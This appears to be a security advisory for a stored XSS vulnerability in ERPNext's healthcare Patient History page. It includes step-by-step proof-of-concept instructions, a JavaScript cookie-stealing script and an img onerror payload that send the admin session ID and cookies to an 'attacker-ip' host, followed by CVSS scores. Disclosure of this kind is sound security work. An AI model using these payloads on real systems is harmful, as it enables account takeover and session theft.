We found results for “


Date: June 22, 2022


In ERPNext, versions v13.0.0-beta.13 through v13.30.0 are vulnerable to Stored XSS at the Patient History page which allows a low privilege user to conduct an account takeover attack.


ERPNext versions v13.0.0-beta.13 through v13.30.0 are vulnerable to stored xss which can lead to account take over.

PoC Details

1. Login into application with low privilege user (like physician)
2. Navigate to the healthcare module and click on 'patients' in 'masters'.
3. Click on ‘new’ to create a new patient entry and fill in the details.
4. Create a file named “test.js” to steal the cookie from the victim.

var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
url = 'http://attacker-ip:attacker-port/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;

5. Type the malicious payload script in the 'surgical history' field and then click 'save'. (the payload can be found in the ‘Poc Code’).
6.Run an HTTP server (like simple HTTP server) to host the malicious file.
7. Open a new tab, and login to the application as an ‘administrator’ and navigate to ‘patient history’ in ‘records and history’ from the ‘healthcare’ area.
8. Search for the specific patient you created earlier and then the patient history will be loaded to the page. Finally, the malicious script in the parameter ‘surgical history’ will be executed.

PoC Code

<img src=x onerror=this.src='http://attacker-ip:attacker-port/?c='+(((document.documentElement.innerHTML).match(/\"sid\":\s\"[0-9a-zA-Z]+\"/gm))[0].split(':')[1]).substring(2,58) >

Affected Environments

ERPNext versions v13.0.0-beta.13 through v13.30.0


No fix version has released yet

Language: Python

Good to know:


Cross-Site Scripting (XSS)


Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information: